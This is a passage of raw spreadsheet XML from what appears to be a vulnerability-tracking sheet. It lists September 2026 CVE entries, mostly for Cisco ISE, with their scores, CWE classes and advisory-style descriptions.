      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the client provisioning download feature of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to access protected files on an affected device.
This vulnerability is due to insufficient validation of directory traversal character sequences in a user-supplied path when the software processes provisioning resource requests. An attacker could exploit this vulnerability by sending a crafted request to the provisioning download service. A successful exploit could allow the attacker to access protected files without authentication, potentially exposing sensitive information.</t>
        </is>
      </c>
      <c r="S251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76433</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76439</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the endpoint posture status reporting functionality of the guest portal web application of Cisco ISE could allow an unauthenticated, remote attacker to submit forged posture status events into the endpoint posture pipeline.
This vulnerability is due to insufficient authentication on an internal interface that is exposed through the guest portal. An attacker could exploit this vulnerability by sending a crafted request to an affected system. A successful exploit could allow the attacker to manipulate the posture status on the affected system.</t>
        </is>
      </c>
      <c r="S252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76439</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76444</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr"/>
      <c r="Q253" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in an internal service of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to retrieve sensitive configuration information from an affected device.
This vulnerability is due to missing authentication on the Policy Runtime Repository Table (PRRT) service. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to obtain sensitive configuration information from the affected device.</t>
        </is>
      </c>
      <c r="S253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76444</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76447</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Online Certificate Status Protocol (OCSP) responder of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to cause an administrative reload of the OCSP responder certificate and key material.
This vulnerability is due to missing authentication on a function of the OCSP responder. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to cause the OCSP responder to reload certificate and key material on demand.</t>
        </is>
      </c>
      <c r="S254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76447</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92568</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>MLRun through 1.11.0 contains a server-side request forgery vulnerability in the WebhookNotification handler that allows authenticated users to make the API server send arbitrary HTTP requests to internal addresses. Attackers can update a run with a malicious webhook notification that executes when the run reaches a terminal state, enabling requests to internal services, Kubernetes APIs, or cloud metadata endpoints from within the cluster.</t>
        </is>
      </c>
      <c r="S255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92568</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9338</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere_application_server</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to trigger excessive resource consumption, potentially leading to reduced availability of the affected service.</t>
        </is>
      </c>
      <c r="S256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9338</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90563</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in maliangnansheng bbs-springboot 3.0.0. This affects the function utils.toToc of the file ArticleController.java. This manipulation causes cross site scripting. The attack is possible to be carried out remotely.</t>
        </is>
      </c>
      <c r="S257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90563</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19729</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the key provider component of the keycloak-services library, which is the core engine for the Red Hat Build of Keycloak. The issue occurs because a previous fix for path probing was incomplete, allowing a realm administrator to still submit arbitrary filesystem paths as keystore parameters. This can be used to determine the existence and readability of files on the server, potentially exposing sensitive system information.</t>
        </is>
      </c>
      <c r="S258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19729</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20072</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to obtain sensitive information from network users that are outside the security group that the attacker is assigned to. &amp;nbsp;
This vulnerability exists because certain files lack proper authorization enforcement. An attacker with administrative privileges and management rights over network users could exploit this vulnerability by exporting the&amp;nbsp;users. A successful exploit could allow the attacker to view passwords that are normally not visible to administrators.&amp;nbsp;</t>
        </is>
      </c>
      <c r="S259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20072</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20235</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the API of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to view sensitive information on an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to insufficient validation of user-supplied parameters in API requests. An attacker could exploit this vulnerability by sending a crafted API request to an affected device. A successful exploit could allow the attacker to gain access to sensitive information, including hashed credentials that could be used in future attacks.</t>
        </is>
      </c>
      <c r="S260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20235</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20282</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr">
        <is>
          <t>CWE-641</t>
        </is>
      </c>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to obtain write access on the underlying operating system of an affected device.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain write access to the underlying operating system.
To exploit this vulnerability, the attacker must have valid administrative credentials.
Note: For CVE-2026-20282, Cisco has assigned a Security Impact Rating (SIR) of High rather than Medium as the score indicates. The reason is that it is easy to get to root from the achieved privilege level.</t>
        </is>
      </c>
      <c r="S261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20282</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76426</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to conduct SQL injection attacks against the monitoring database.
This vulnerability is due to insufficient validation of specific parameters that are then concatenated into an SQL statement. An attacker could exploit this vulnerability by sending a crafted request that contains SQL statements in one of the affected parameters. A successful exploit could allow the attacker to read information from the monitoring database. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76426</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76427</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the offline profiler feed service of Cisco ISE could allow an authenticated, remote attacker to read arbitrary files that are stored on an affected device.
This vulnerability is due to the parsing of attacker-controlled feed metadata with an XML parser that does not disable external entity resolution. An attacker could exploit this vulnerability by uploading a crafted offline feed package through the administrative interface. A successful exploit could allow the attacker to read arbitrary files from the file system and issue requests to internal systems from the affected device. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76427</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76428</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST APIs of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to conduct SQL injection attacks against the session database.
This vulnerability is due to certain parameters being concatenated directly into SQL clauses without parameterization. An attacker could exploit this vulnerability by sending a crafted request that contains SQL statements in one of the affected parameters. A successful exploit could allow the attacker to read information from the session database. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76428</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76431</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the file management function of the web-based management interface of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to delete arbitrary files and directories on an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to improper validation of directory traversal character sequences in a user-supplied file path before the request is validated. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to delete arbitrary files and directories on the underlying operating system of the affected device.</t>
        </is>
      </c>
      <c r="S265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76431</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76432</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr"/>
      <c r="Q266" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker with administrative-level privileges to write arbitrary files on an affected device.
This vulnerability exists because the affected software does not properly validate directory traversal character sequences in a user-supplied file path during the upload process. An attacker could exploit this vulnerability by uploading a crafted file to the affected system. A successful exploit could allow the attacker to write files to an arbitrary location on the affected system.</t>
        </is>
      </c>
      <c r="S266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76432</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76434</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
